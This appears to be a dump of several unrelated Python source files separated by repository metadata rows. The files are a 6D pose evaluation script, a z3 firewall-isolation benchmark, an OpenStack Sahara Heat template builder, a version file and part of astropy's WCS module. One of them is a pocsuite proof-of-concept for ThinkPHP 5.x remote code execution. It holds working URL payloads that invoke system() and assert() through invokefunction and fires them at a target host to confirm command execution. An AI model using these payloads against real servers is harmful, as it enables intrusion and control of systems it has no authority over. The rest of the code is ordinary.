from detect.eval.src.config import prepare_cfg, prepare_weight
sys.path.append('./keypoint/train_sppe')
from keypoint.train_sppe.main_fast_inference import InferenNet_fast
from keypoint.train_sppe.utils.eval import getPrediction
from keypoint.train_sppe.utils.img import im_to_torch
def parse_arg():
parser = argparse.ArgumentParser(description='YOLO v3 evaluation')
# parser.add_argument('--bs', type=int, help="Batch size")
parser.add_argument('--reso', type=int, help="Image resolution")
parser.add_argument('--kptype', type=str, help="Keypoint type")
parser.add_argument('--kpnum', type=int, help="Checkpoint path")
parser.add_argument('--topk', type=int, help="Checkpoint path")
parser.add_argument('--gpu', default='0,1,2,3', help="GPU ids")
parser.add_argument('--name', type=str, choices=['linemod-single', 'linemod-occ'])
parser.add_argument('--seq', type=str, help="Sequence number")
parser.add_argument('--ckpt', type=str, help="Checkpoint path")
parser.add_argument('-save', action='store_true', help="Save pose figure")
return parser.parse_args()
args = parse_arg()
os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu
if __name__ == '__main__':
print(args)
bench = SixdToolkit(dataset='hinterstoisser', kpnum=args.kpnum,
kptype=args.kptype, is_train=False)
kp3d = bench.models[args.seq]
_, val_dataloder = prepare_dataset(args.name, args.reso, 1, args.seq)
detector = Detector(
cfgfile=prepare_cfg(args.name),
seq=args.seq,
weightfile=prepare_weight(args.ckpt)
)
pose_model = InferenNet_fast(
dataset=args.name,
kernel_size=5,
seqname=args.seq,
kpnum=args.kpnum,
kptype=args.kptype
).cuda()
tbar = tqdm(val_dataloder)
result = dict()
for batch_idx, (inputs, labels, meta) in enumerate(tbar):
img_path = meta['path'][0]
idx = img_path.split('/')[-1].split('.')[0]
inputs = inputs.cuda()
with torch.no_grad():
# object detection
try:
bboxes, confs = detector.detect(inputs)
except Exception:
# No object found
# print("detection failed")
continue
# keypoint localization
orig_img = cv2.imread(meta['path'][0])
orig_inp = im_to_torch(cv2.cvtColor(orig_img, cv2.COLOR_BGR2RGB))
cropped_inputs, pt1, pt2 = crop_from_dets(
orig_inp, bboxes[0], 320, 256)
hms = pose_model(cropped_inputs.unsqueeze(0).cuda()).cpu()
try:
_, pred_kps, pred_kps_score = getPrediction(
hms, pt1.unsqueeze(0), pt2.unsqueeze(0), 320, 256, 80, 64)
except Exception:
# print("Jump Error frame", idx)
continue
# pose estimation
K = args.topk
best_idx = np.argsort(pred_kps_score[0, :, 0]).flip(0)
best_k = best_idx[:K]
pred_pose = bench.solve_pnp(
bench.kps[args.seq][best_k], pred_kps[0][best_k].numpy())
result[int(idx)] = {
'bbox': bboxes[0].numpy(),
'kps': pred_kps[0].numpy(),
'pose': pred_pose
}
if args.save is True:
f = bench.frames[args.seq][int(idx)]
annot = f['annots'][f['obj_ids'].index(int(args.seq))]
gt_pose = annot['pose']
save_path = os.path.join('./results/pose/%s.png' % idx)
draw_6d_pose(img_path, gt_pose, pred_pose,
kp3d, bench.cam, save_path)
with open('./results/%s.pkl' % args.seq, 'wb') as handle:
pickle.dump(result, handle, protocol=pickle.HIGHEST_PROTOCOL)
print("[LOG] Done!")
| 36.304348
| 86
| 0.610299
|
4e130a2cf53e3e5fd12f2701f44fdaadaa7d8e1c
| 4,754
|
py
|
Python
|
vul/55-thinkphp5x-getshell.py
|
zx273983653/vulscan
|
787397e267c4e6469522ee0abe55b3e98f968d4a
|
[
"MIT"
] | 582
|
2019-02-23T09:23:33.000Z
|
2022-03-31T04:42:08.000Z
|
vul/55-thinkphp5x-getshell.py
|
git-wsf/vulscan
|
112f8d6104daecfaaad579f73029a26d56aaa9b3
|
[
"MIT"
] | 6
|
2019-03-20T10:37:48.000Z
|
2020-03-10T06:20:07.000Z
|
vul/55-thinkphp5x-getshell.py
|
git-wsf/vulscan
|
112f8d6104daecfaaad579f73029a26d56aaa9b3
|
[
"MIT"
] | 183
|
2019-02-23T06:00:18.000Z
|
2022-03-20T02:17:57.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Copyright (c) 2014-2015 pocsuite developers (http://seebug.org)
See the file 'docs/COPYING' for copying permission
"""
# 命令行
from pocsuite import pocsuite_cli
# 验证模块
from pocsuite import pocsuite_verify
# 攻击模块
from pocsuite import pocsuite_attack
# 控制台模式
from pocsuite import pocsuite_console
# requests
from pocsuite.api.request import req
import urllib
# register
from pocsuite.api.poc import register
# report
from pocsuite.api.poc import Output, POCBase
# url转换host
from pocsuite.lib.utils.funs import url2ip
import re
# 基础基类
class webLogicPOC(POCBase):
vulID = '55' # ssvid ID 如果是提交漏洞的同时提交 PoC,则写成 0
version = '1' # 默认为1
vulDate = '2018-12-11' # 漏洞公开的时间,不知道就写今天
author = 'xiaohuihui1' # PoC作者的大名
createDate = '2018-12-11' # 编写 PoC 的日期
updateDate = '2018-12-11' # PoC 更新的时间,默认和编写时间一样
references = [''] # 漏洞地址来源,0day不用写
name = 'thinkphp getshell' # PoC 名称
appPowerLink = [''] # 漏洞厂商主页地址
appName = 'thinkphp getshell' # 漏洞应用名称
appVersion = 'v5.0.23及v5.1.31以下版本' # 漏洞影响版本
vulType = 'thinkphp getshell' # 漏洞类型,类型参考见 漏洞类型规范表
desc = '''
thinkphp getshell
''' # 漏洞简要描述
samples = [] # 测试样列,就是用 PoC 测试成功的网站
install_requires = [] # PoC 第三方模块依赖,请尽量不要使用第三方模块,必要时请参考《PoC第三方模块依赖说明》填写
cvss = u"严重" # 严重,高危,中危,低危
# 指纹方法
def _fingerprint(self):
pass
# 验证模块 pocsuite -r 1-redis.py -u 1.1.1.1 --verify
def _verify(self):
# 调用指纹方法
result={}
#如果设置端口则取端口,没有设置则为默认端口
import re
import socket
import time
vul_url = "%s"%self.url
# from pocsuite.lib.utils.funs import url2ip
_port = re.findall(':(\d+)\s*', vul_url)
if len(_port) != 0:
_host = url2ip(vul_url)[0]
_port = int(url2ip(vul_url)[1])
else :
_host = url2ip(vul_url)
_port = 80
#判断端口是否开放
import socket
sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sk.settimeout(1)
try:
sk.connect((_host,_port))
#print 'Server port is OK!'
except Exception:
return self.save_output(result)
sk.close()
vul_ip = "http://%s:%s/" % (_host, _port)
payloads=["index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=printf&vars[1][]=ads3234asdg34ggasda222",
"index.php?s=admin/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=printf&vars[1][]=ads3234asdg34ggasda222",
"index.php?s=index/\\think\Request/input&filter=printf&data=ads3234asdg34ggasda222",
"index.php?s=index/\\think\\view\driver\Php/display&content=<?php printf 'ads3234asdg34ggasda222';?>",
"index.php?s=index/\\think\Container/invokefunction&function=call_user_func_array&vars[0]=printf&vars[1][]=ads3234asdg34ggasda222"]
payloads2=["index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls",
"index.php?s=admin/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()",
"index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=dir",
"index.php?s=index/\\think\\view\driver\Php/display&content=<?php phpinfo();?>",
"index.php?s=index/\\think\Container/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()",
"index.php?s=index/\\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls",
"index.php?s=index/\\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=dir"]
for p in payloads2:
url=vul_ip+p
try:
text = req.get(url,timeout=4).text
if ("index.php" in text and "robots.txt" in text) or ("Configuration File" in text):
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = vul_ip
result['VerifyInfo']['Payload'] = p
return self.save_output(result)
except Exception as e:
print e
pass
return self.save_output(result)
# 攻击模块
def _attack(self):
return self._verify()
#pass
# 输出报告
def save_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail()
return output
# 注册类
register(webLogicPOC)
| 35.477612
| 149
| 0.604544
|
ecbb530072bcd2a6c2e50d607d8632e645d10ce6
| 1,480
|
py
|
Python
|
tests/single_fw_test_rono.py
|
apanda/modeling
|
e032abd413bb3325ad6e5995abadeef74314f383
|
[
"BSD-3-Clause"
] | 3
|
2017-08-30T05:24:11.000Z
|
2021-02-25T12:17:19.000Z
|
tests/single_fw_test_rono.py
|
apanda/modeling
|
e032abd413bb3325ad6e5995abadeef74314f383
|
[
"BSD-3-Clause"
] | null | null | null |
tests/single_fw_test_rono.py
|
apanda/modeling
|
e032abd413bb3325ad6e5995abadeef74314f383
|
[
"BSD-3-Clause"
] | 2
|
2017-11-15T07:00:48.000Z
|
2020-12-13T17:29:03.000Z
|
from examples import RonoDMZTest, RonoQuarantineTest, RonoHostTest
import z3
import time
import random
import sys
def ResetZ3 ():
z3._main_ctx = None
z3.main_ctx()
z3.set_param('smt.random_seed', random.SystemRandom().randint(0, sys.maxint))
iters = 10
min_hosts = 5
max_hosts = 1000
print "host dmz_time q_time h_time total"
for h in xrange(min_hosts, max_hosts):
for i in xrange(iters):
dmz_time = 0.0
for i in xrange(h):
ResetZ3()
dmz = RonoDMZTest(h, h, h)
start = time.time()
res = dmz.check.CheckIsolationFlowProperty(dmz.outside, dmz.dmz)
assert res.result == z3.sat
stop = time.time()
dmz_time += (stop - start)
q_time = 0.0
for i in xrange(h):
ResetZ3()
quarantine = RonoQuarantineTest(h, h, h)
start = time.time()
res = quarantine.check.CheckIsolationProperty(quarantine.outside, quarantine.quarantine)
assert res.result == z3.unsat
stop = time.time()
q_time += (stop - start)
h_time = 0.0
for i in xrange(h):
ResetZ3()
host = RonoHostTest(h, h, h)
start = time.time()
res = host.check.CheckIsolationProperty(host.outside, host.host)
res2 = host.check.CheckIsolationFlowProperty(host.outside, host.host)
assert res.result == z3.sat and res2.result == z3.unsat
stop = time.time()
h_time += (stop - start)
print "%d %f %f %f %f"%(h, dmz_time, q_time, h_time, dmz_time + q_time + h_time)
| 29.6
| 94
| 0.643919
|
dca261285bbc82d0f6bb050d5c4ada764c11c359
| 23,199
|
py
|
Python
|
sahara/service/heat/templates.py
|
ksshanam/sahara
|
0d259f7a71447cd0cefe4f11184cc2ee335f4e33
|
[
"Apache-2.0"
] | null | null | null |
sahara/service/heat/templates.py
|
ksshanam/sahara
|
0d259f7a71447cd0cefe4f11184cc2ee335f4e33
|
[
"Apache-2.0"
] | null | null | null |
sahara/service/heat/templates.py
|
ksshanam/sahara
|
0d259f7a71447cd0cefe4f11184cc2ee335f4e33
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) 2015 Mirantis Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
from oslo_config import cfg
from oslo_log import log as logging
from oslo_serialization import jsonutils as json
import six
import yaml
from sahara.plugins import provisioning as plugin_provisioning
from sahara.service.heat import commons as heat_common
from sahara.utils import cluster as cl
from sahara.utils import general as g
from sahara.utils.openstack import base as b
from sahara.utils.openstack import heat as h
from sahara.utils.openstack import neutron
CONF = cfg.CONF
LOG = logging.getLogger(__name__)
SSH_PORT = 22
INSTANCE_RESOURCE_NAME = "inst"
SERVER_GROUP_NAMES = "servgroups"
AUTO_SECURITY_GROUP_PARAM_NAME = "autosecgroup"
INTERNAL_DESIGNATE_REC = "internal_designate_record"
INTERNAL_DESIGNATE_REV_REC = "internal_designate_reverse_record"
EXTERNAL_DESIGNATE_REC = "external_designate_record"
EXTERNAL_DESIGNATE_REV_REC = "external_designate_reverse_record"
# TODO(vgridnev): Using insecure flag until correct way to pass certificate
# will be invented
WAIT_CONDITION_SCRIPT_TEMPLATE = '''
while true; do
wc_notify --insecure --data-binary '{"status": "SUCCESS"}'
if [ $? -eq 0 ]; then
break
fi
sleep 10
done
'''
heat_engine_opts = [
cfg.BoolOpt(
'heat_enable_wait_condition', default=True,
help="Enable wait condition feature to reduce polling during cluster "
"creation")
]
CONF.register_opts(heat_engine_opts)
def _get_inst_name(ng):
return {
"list_join": [
'-',
[ng.cluster.name.lower(), ng.name.lower(),
{"get_param": "instance_index"}]
]
}
def _get_inst_domain_name(domain):
return {
"list_join": [
'.',
[{"get_attr": [INSTANCE_RESOURCE_NAME, "name"]}, domain]]
}
def _get_aa_group_name(cluster, server_group_index):
return g.generate_aa_group_name(cluster.name, server_group_index)
def _get_port_name(ng):
return {
"list_join": [
'-',
[ng.cluster.name.lower(), ng.name.lower(),
{"get_param": "instance_index"},
"port"]
]
}
def _get_floating_name(ng):
return {
"list_join": [
'-',
[ng.cluster.name.lower(), ng.name.lower(),
{"get_param": "instance_index"},
"floating"]
]
}
def _get_floating_assoc_name(ng):
return {
"list_join": [
'-',
[ng.cluster.name.lower(), ng.name.lower(),
{"get_param": "instance_index"},
"floating", "assoc"]
]
}
def _get_volume_name(ng):
return {
"list_join": [
'-',
[ng.cluster.name.lower(), ng.name.lower(),
{"get_param": "instance_index"},
"volume", {"get_param": "volume_index"}]
]
}
def _get_wc_handle_name(inst_name):
return '%s-wc-handle' % inst_name
def _get_wc_waiter_name(inst_name):
return '%s-wc-waiter' % inst_name
def _get_index_from_inst_name(inst_name):
return inst_name.split('-')[-1]
class ClusterStack(object):
def __init__(self, cluster):
self.cluster = cluster
self.node_groups_extra = {}
self.files = {}
self.last_updated_time = None
self.base_info = (
"Data Processing Cluster by Sahara\n"
"Sahara cluster name: {cluster}\n"
"Sahara engine: {version}".format(
cluster=cluster.name, version=heat_common.HEAT_ENGINE_VERSION)
)
self._current_sg_index = 1
def _node_group_description(self, ng):
return "{info}\nNode group {node_group}".format(
info=self.base_info, node_group=ng.name)
def _asg_for_node_group_description(self, ng):
return ("{info}\n"
"Auto security group for Sahara Node Group: "
"{node_group}".format(info=self.base_info, node_group=ng.name))
def _volume_for_node_group_description(self, ng):
return ("{info}\n"
"Volume for Sahara Node Group {node_group}".format(
node_group=ng.name, info=self.base_info))
def add_node_group_extra(self, node_group_id, node_count,
gen_userdata_func, instances_to_delete=None):
self.node_groups_extra[node_group_id] = {
'node_count': node_count,
'gen_userdata_func': gen_userdata_func,
'instances_to_delete': instances_to_delete
}
def _get_main_template(self, instances_to_delete=None):
outputs = {}
resources = self._serialize_resources(outputs, instances_to_delete)
return yaml.safe_dump({
"heat_template_version": heat_common.HEAT_TEMPLATE_VERSION,
"description": self.base_info,
"resources": resources,
"outputs": outputs
})
def instantiate(self, update_existing, disable_rollback=True,
instances_to_delete=None):
main_tmpl = self._get_main_template(instances_to_delete)
kwargs = {
'stack_name': self.cluster.stack_name,
'timeout_mins': 180,
'disable_rollback': disable_rollback,
'parameters': {},
'template': main_tmpl,
'files': self.files
}
if CONF.heat_stack_tags:
kwargs['tags'] = ",".join(CONF.heat_stack_tags)
log_kwargs = copy.deepcopy(kwargs)
log_kwargs['template'] = yaml.safe_load(log_kwargs['template'])
for filename in log_kwargs['files'].keys():
log_kwargs['files'][filename] = yaml.safe_load(
log_kwargs['files'][filename])
log_kwargs = json.dumps(log_kwargs)
if not update_existing:
LOG.debug("Creating Heat stack with args: \n{args}"
.format(args=log_kwargs))
b.execute_with_retries(h.client().stacks.create, **kwargs)
else:
stack = h.get_stack(self.cluster.stack_name)
self.last_updated_time = stack.updated_time
LOG.debug("Updating Heat stack {stack} with args: \n"
"{args}".format(stack=stack, args=log_kwargs))
b.execute_with_retries(stack.update, **kwargs)
def _get_server_group_name(self):
index = self._current_sg_index
# computing server group index in round robin fashion
if index < self.cluster.anti_affinity_ratio:
self._current_sg_index = (index + 1)
else:
self._current_sg_index = 1
return _get_aa_group_name(self.cluster, self._current_sg_index)
def _need_aa_server_group(self, node_group):
for node_process in node_group.node_processes:
if node_process in self.cluster.anti_affinity:
return True
return False
def _get_anti_affinity_scheduler_hints(self, node_group):
if not self._need_aa_server_group(node_group):
return {}
return {
"scheduler_hints": {
"group": {
"get_param": [SERVER_GROUP_NAMES,
{"get_param": "instance_index"}]
}
}
}
def _serialize_resources(self, outputs, instances_to_delete=None):
resources = {}
if self.cluster.anti_affinity:
# Creating server groups equal to the anti_affinity_ratio
for i in range(1, self.cluster.anti_affinity_ratio):
resources.update(self._serialize_aa_server_group(i))
for ng in self.cluster.node_groups:
resources.update(self._serialize_ng_group(ng, outputs,
instances_to_delete))
for ng in self.cluster.node_groups:
resources.update(self._serialize_auto_security_group(ng))
return resources
def _serialize_ng_group(self, ng, outputs, instances_to_delete=None):
ng_file_name = "file://" + ng.name + ".yaml"
self.files[ng_file_name] = self._serialize_ng_file(ng)
outputs[ng.name + "-instances"] = {
"value": {"get_attr": [ng.name, "instance"]}}
properties = {"instance_index": "%index%"}
if ng.cluster.anti_affinity:
ng_count = ng.count
# assuming instance_index also start from index 0
for i in range(0, ng_count - 1):
server_group_name = self._get_server_group_name()
server_group_resource = {
"get_resource": server_group_name
}
properties[SERVER_GROUP_NAMES].insert(i, server_group_resource)
if ng.auto_security_group:
properties[AUTO_SECURITY_GROUP_PARAM_NAME] = {
'get_resource': g.generate_auto_security_group_name(ng)}
removal_policies = []
if self.node_groups_extra[ng.id]['instances_to_delete']:
resource_list = []
for name in self.node_groups_extra[ng.id]['instances_to_delete']:
resource_list.append(_get_index_from_inst_name(name))
removal_policies.append({'resource_list': resource_list})
return {
ng.name: {
"type": "OS::Heat::ResourceGroup",
"properties": {
"count": self.node_groups_extra[ng.id]['node_count'],
"removal_policies": removal_policies,
"resource_def": {
"type": ng_file_name,
"properties": properties
}
}
}
}
def _serialize_ng_file(self, ng):
parameters = {"instance_index": {"type": "string"}}
if ng.cluster.anti_affinity:
parameters[SERVER_GROUP_NAMES] = {"type": "comma_delimited_list",
"default": []}
if ng.auto_security_group:
parameters[AUTO_SECURITY_GROUP_PARAM_NAME] = {'type': "string"}
return yaml.safe_dump({
"heat_template_version": heat_common.HEAT_TEMPLATE_VERSION,
"description": self._node_group_description(ng),
"parameters": parameters,
"resources": self._serialize_instance(ng),
"outputs": {
"instance": {"value": {
"physical_id": {"get_resource": INSTANCE_RESOURCE_NAME},
"name": {"get_attr": [INSTANCE_RESOURCE_NAME, "name"]}
}}}
})
def _serialize_auto_security_group(self, ng):
if not ng.auto_security_group:
return {}
security_group_name = g.generate_auto_security_group_name(ng)
security_group_description = self._asg_for_node_group_description(ng)
res_type = "OS::Neutron::SecurityGroup"
desc_key = "description"
rules_key = "rules"
create_rule = lambda ip_version, cidr, proto, from_port, to_port: {
"ethertype": "IPv{}".format(ip_version),
"remote_ip_prefix": cidr,
"protocol": proto,
"port_range_min": six.text_type(from_port),
"port_range_max": six.text_type(to_port)}
rules = self._serialize_auto_security_group_rules(ng, create_rule)
return {
security_group_name: {
"type": res_type,
"properties": {
desc_key: security_group_description,
rules_key: rules
}
}
}
def _serialize_auto_security_group_rules(self, ng, create_rule):
rules = []
for port in ng.open_ports:
rules.append(create_rule(4, '0.0.0.0/0', 'tcp', port, port))
rules.append(create_rule(6, '::/0', 'tcp', port, port))
rules.append(create_rule(4, '0.0.0.0/0', 'tcp', SSH_PORT, SSH_PORT))
rules.append(create_rule(6, '::/0', 'tcp', SSH_PORT, SSH_PORT))
# open all traffic for private networks
for cidr in neutron.get_private_network_cidrs(ng.cluster):
ip_ver = 6 if ':' in cidr else 4
for protocol in ['tcp', 'udp']:
rules.append(create_rule(ip_ver, cidr, protocol, 1, 65535))
rules.append(create_rule(ip_ver, cidr, 'icmp', 0, 255))
return rules
@staticmethod
def _get_wait_condition_timeout(ng):
configs = ng.cluster.cluster_configs
timeout_cfg = plugin_provisioning.HEAT_WAIT_CONDITION_TIMEOUT
cfg_target = timeout_cfg.applicable_target
cfg_name = timeout_cfg.name
return int(configs.get(cfg_target,
{}).get(cfg_name, timeout_cfg.default_value))
def _serialize_designate_records(self):
if not self.cluster.use_designate_feature():
return {}
hostname = _get_inst_domain_name(self.cluster.domain_name)
return {
INTERNAL_DESIGNATE_REC: {
'type': 'OS::Designate::Record',
'properties': {
'name': hostname,
'type': 'A',
'data': {'get_attr': [
INSTANCE_RESOURCE_NAME, 'networks', 'private', 0]},
'domain': self.cluster.domain_name
}
},
EXTERNAL_DESIGNATE_REC: {
'type': 'OS::Designate::Record',
'properties': {
'name': hostname,
'type': 'A',
'data': {'get_attr': ['floating_ip', 'ip']},
'domain': self.cluster.domain_name
}
}
}
def _serialize_designate_reverse_records(self):
if not self.cluster.use_designate_feature():
return {}
def _generate_reversed_ip(ip):
return {
'list_join': [
'.',
[
{'str_split': ['.', ip, 3]},
{'str_split': ['.', ip, 2]},
{'str_split': ['.', ip, 1]},
{'str_split': ['.', ip, 0]},
'in-addr.arpa.'
]
]
}
hostname = _get_inst_domain_name(self.cluster.domain_name)
return {
INTERNAL_DESIGNATE_REV_REC: {
'type': 'OS::Designate::Record',
'properties': {
'name': _generate_reversed_ip({'get_attr': [
INSTANCE_RESOURCE_NAME, 'networks', 'private', 0]}),
'type': 'PTR',
'data': hostname,
'domain': 'in-addr.arpa.'
}
},
EXTERNAL_DESIGNATE_REV_REC: {
'type': 'OS::Designate::Record',
'properties': {
'name': _generate_reversed_ip(
{'get_attr': ['floating_ip', 'ip']}),
'type': 'PTR',
'data': hostname,
'domain': 'in-addr.arpa.'
}
}
}
def _serialize_instance(self, ng):
resources = {}
properties = {}
inst_name = _get_inst_name(ng)
private_net = self.cluster.neutron_management_network
sec_groups = self._get_security_groups(ng)
# Check if cluster contains user key-pair and include it to template.
if self.cluster.user_keypair_id:
properties["key_name"] = self.cluster.user_keypair_id
port_name = _get_port_name(ng)
resources.update(self._serialize_port(
port_name, private_net, sec_groups))
properties["networks"] = [{"port": {"get_resource": "port"}}]
if ng.floating_ip_pool:
resources.update(self._serialize_neutron_floating(ng))
gen_userdata_func = self.node_groups_extra[ng.id]['gen_userdata_func']
key_script = gen_userdata_func(ng, inst_name)
if CONF.heat_enable_wait_condition:
etc_hosts = cl.etc_hosts_entry_for_service('orchestration')
if etc_hosts:
etc_hosts = "echo '%s' | sudo tee -a /etc/hosts" % etc_hosts
tml = [key_script, WAIT_CONDITION_SCRIPT_TEMPLATE]
if etc_hosts:
tml = [key_script, etc_hosts, WAIT_CONDITION_SCRIPT_TEMPLATE]
userdata = {
"str_replace": {
"template": "\n".join(tml),
"params": {
"wc_notify": {
"get_attr": [
_get_wc_handle_name(ng.name),
"curl_cli"
]
}
}
}
}
else:
userdata = key_script
if ng.availability_zone:
properties["availability_zone"] = ng.availability_zone
properties.update(self._get_anti_affinity_scheduler_hints(ng))
properties.update({
"name": inst_name,
"flavor": six.text_type(ng.flavor_id),
"image": ng.get_image_id(),
"admin_user": ng.image_username,
"user_data": userdata
})
resources.update({
INSTANCE_RESOURCE_NAME: {
"type": "OS::Nova::Server",
"properties": properties
}
})
resources.update(self._serialize_designate_records())
resources.update(self._serialize_designate_reverse_records())
resources.update(self._serialize_volume(ng))
resources.update(self._serialize_wait_condition(ng))
return resources
def _serialize_wait_condition(self, ng):
if not CONF.heat_enable_wait_condition:
return {}
return {
_get_wc_handle_name(ng.name): {
"type": "OS::Heat::WaitConditionHandle"
},
_get_wc_waiter_name(ng.name): {
"type": "OS::Heat::WaitCondition",
"depends_on": INSTANCE_RESOURCE_NAME,
"properties": {
"timeout": self._get_wait_condition_timeout(ng),
"handle": {"get_resource": _get_wc_handle_name(ng.name)}
}
}
}
def _serialize_neutron_floating(self, ng):
return {
"floating_ip": {
"type": "OS::Neutron::FloatingIP",
"properties": {
"floating_network_id": ng.floating_ip_pool,
"port_id": {"get_resource": "port"}
}
}
}
def _serialize_port(self, port_name, fixed_net_id, security_groups):
properties = {
"network_id": fixed_net_id,
"replacement_policy": "AUTO",
"name": port_name
}
if security_groups:
properties["security_groups"] = security_groups
return {
"port": {
"type": "OS::Neutron::Port",
"properties": properties,
}
}
def _serialize_volume(self, ng):
if not ng.volumes_size or not ng.volumes_per_node:
return {}
volume_file_name = "file://" + ng.name + "-volume.yaml"
self.files[volume_file_name] = self._serialize_volume_file(ng)
return {
ng.name: {
"type": "OS::Heat::ResourceGroup",
"properties": {
"count": ng.volumes_per_node,
"resource_def": {
"type": volume_file_name,
"properties": {
"volume_index": "%index%",
"instance_index": {"get_param": "instance_index"},
"instance": {"get_resource":
INSTANCE_RESOURCE_NAME}}
}
}
}
}
def _serialize_volume_file(self, ng):
volume_name = _get_volume_name(ng)
properties = {
"name": volume_name,
"size": six.text_type(ng.volumes_size)
}
if ng.volume_type:
properties["volume_type"] = ng.volume_type
if ng.volumes_availability_zone:
properties["availability_zone"] = ng.volumes_availability_zone
if ng.volume_local_to_instance:
properties["scheduler_hints"] = {
"local_to_instance": {"get_param": "instance"}}
return yaml.safe_dump({
"heat_template_version": heat_common.HEAT_TEMPLATE_VERSION,
"description": self._volume_for_node_group_description(ng),
"parameters": {
"volume_index": {
"type": "string"
},
"instance_index": {
"type": "string"
},
"instance": {
"type": "string"
}},
"resources": {
"volume": {
"type": "OS::Cinder::Volume",
"properties": properties
},
"volume-attachment": {
"type": "OS::Cinder::VolumeAttachment",
"properties": {
"instance_uuid": {"get_param": "instance"},
"volume_id": {"get_resource": "volume"},
}
}},
"outputs": {}
})
def _get_security_groups(self, node_group):
node_group_sg = list(node_group.security_groups or [])
if node_group.auto_security_group:
node_group_sg += [
{"get_param": AUTO_SECURITY_GROUP_PARAM_NAME}
]
return node_group_sg
def _serialize_aa_server_group(self, server_group_index):
server_group_name = _get_aa_group_name(self.cluster,
server_group_index)
return {
server_group_name: {
"type": "OS::Nova::ServerGroup",
"properties": {
"name": server_group_name,
"policies": ["anti-affinity"]
}
}
}
def get_node_group_instances(self, node_group):
cluster = node_group.cluster
outputs = h.get_stack_outputs(cluster)
for output in outputs:
if output['output_key'] == node_group.name + "-instances":
return output["output_value"]
return []
| 34.625373
| 79
| 0.550756
|
6eeda0464e647c9d2c640d0ed269b8f90e22a801
| 157
|
py
|
Python
|
lightkurve/version.py
|
jsk389/lightkurve
|
2fe031708f4c241b61796ccdacf658717b2ffa44
|
[
"MIT"
] | null | null | null |
lightkurve/version.py
|
jsk389/lightkurve
|
2fe031708f4c241b61796ccdacf658717b2ffa44
|
[
"MIT"
] | null | null | null |
lightkurve/version.py
|
jsk389/lightkurve
|
2fe031708f4c241b61796ccdacf658717b2ffa44
|
[
"MIT"
] | null | null | null |
# It is important to store the version number in a separate file
# so that we can read it from setup.py without importing the package
__version__ = "1.0b13"
| 39.25
| 68
| 0.770701
|
88f7b29530acaa88545a7043d699d0e21344494e
| 127,618
|
py
|
Python
|
astropy/wcs/wcs.py
|
mehrdad-shokri/astropy
|
abd73b51277694338c8eca7639da956dcd06f207
|
[
"BSD-3-Clause"
] | null | null | null |
astropy/wcs/wcs.py
|
mehrdad-shokri/astropy
|
abd73b51277694338c8eca7639da956dcd06f207
|
[
"BSD-3-Clause"
] | null | null | null |
astropy/wcs/wcs.py
|
mehrdad-shokri/astropy
|
abd73b51277694338c8eca7639da956dcd06f207
|
[
"BSD-3-Clause"
] | null | null | null |
# Licensed under a 3-clause BSD style license - see LICENSE.rst
# Under the hood, there are 3 separate classes that perform different
# parts of the transformation:
#
# - `~astropy.wcs.Wcsprm`: Is a direct wrapper of the core WCS
# functionality in `wcslib`_. (This includes TPV and TPD
# polynomial distortion, but not SIP distortion).
#
# - `~astropy.wcs.Sip`: Handles polynomial distortion as defined in the
# `SIP`_ convention.
#
# - `~astropy.wcs.DistortionLookupTable`: Handles `distortion paper`_
# lookup tables.
#
# Additionally, the class `WCS` aggregates all of these transformations
# together in a pipeline:
#
# - Detector to image plane correction (by a pair of
# `~astropy.wcs.DistortionLookupTable` objects).
#
# - `SIP`_ distortion correction (by an underlying `~astropy.wcs.Sip`
# object)
#
# - `distortion paper`_ table-lookup correction (by a pair of
# `~astropy.wcs.DistortionLookupTable` objects).
#
# - `wcslib`_ WCS transformation (by a `~astropy.wcs.Wcsprm` object)
# STDLIB
import copy
import uuid
import io
import itertools
import os
import re
import textwrap
import warnings
import builtins
# THIRD-PARTY
import numpy as np
# LOCAL
from astropy import log
from astropy.io import fits
from . import docstrings
from . import _wcs
from astropy.utils.compat import possible_filename
from astropy.utils.exceptions import AstropyWarning, AstropyUserWarning, AstropyDeprecationWarning
# Mix-in class that provides the APE 14 API
from .wcsapi.fitswcs import FITSWCSAPIMixin, SlicedFITSWCS
__all__ = ['FITSFixedWarning', 'WCS', 'find_all_wcs',
'DistortionLookupTable', 'Sip', 'Tabprm', 'Wcsprm', 'Auxprm',
'Wtbarr', 'WCSBase', 'validate', 'WcsError', 'SingularMatrixError',
'InconsistentAxisTypesError', 'InvalidTransformError',
'InvalidCoordinateError', 'NoSolutionError',
'InvalidSubimageSpecificationError', 'NoConvergence',
'NonseparableSubimageCoordinateSystemError',
'NoWcsKeywordsFoundError', 'InvalidTabularParametersError']
__doctest_skip__ = ['WCS.all_world2pix']
if _wcs is not None:
_parsed_version = _wcs.__version__.split('.')
if int(_parsed_version[0]) == 5 and int(_parsed_version[1]) < 8:
raise ImportError(
"astropy.wcs is built with wcslib {0}, but only versions 5.8 and "
"later on the 5.x series are known to work. The version of wcslib "
"that ships with astropy may be used.")
if not _wcs._sanity_check():
raise RuntimeError(
"astropy.wcs did not pass its sanity check for your build "
"on your platform.")
WCSBase = _wcs._Wcs
DistortionLookupTable = _wcs.DistortionLookupTable
Sip = _wcs.Sip
Wcsprm = _wcs.Wcsprm
Auxprm = _wcs.Auxprm
Tabprm = _wcs.Tabprm
Wtbarr = _wcs.Wtbarr
WcsError = _wcs.WcsError
